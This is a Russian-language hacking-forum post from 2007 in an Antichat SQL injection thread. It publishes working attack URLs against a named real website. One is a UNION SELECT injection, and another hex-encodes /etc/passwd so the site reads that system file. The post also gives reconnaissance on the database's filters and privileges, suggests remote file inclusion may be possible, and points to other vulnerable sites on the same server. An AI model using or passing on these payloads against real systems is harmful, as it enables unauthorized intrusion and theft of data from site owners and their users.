HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу SQL Инъекции
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

  #11  
Старый 09.11.2007, 18:10
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами: 10274726

Репутация: 1917


По умолчанию
www.maika.by

вот сама скуля:

Код:
http://www.maika.by/index.php?path=products&id=-45%20union%20select%201,2,3,4,5,6,7,8,9,10/*
мускул 5 ветки, file_priv нет, доступа к mysql.user тоже нет, ковычки фильтруются

но интересно другое, эта скуля позволяет инклюдить файлы например:
Код:
http://www.maika.by/index.php?path=products&id=-45%20union%20select%201,2,3,4,0x2F6574632F706173737764,6,7,8,9,10/*
инклюдит /etc/passwd, данные из 5 колонки в чистом виде передаются в функцию main()

Скорее всего возможен инклюд, не только локальных файлов, но у меня неполучилось это проверить, (слишком долго связывается с народом)

на серве есть еще несколько сайтов подобной тематики
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием
 



Предыдущая тема Следующая тема

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.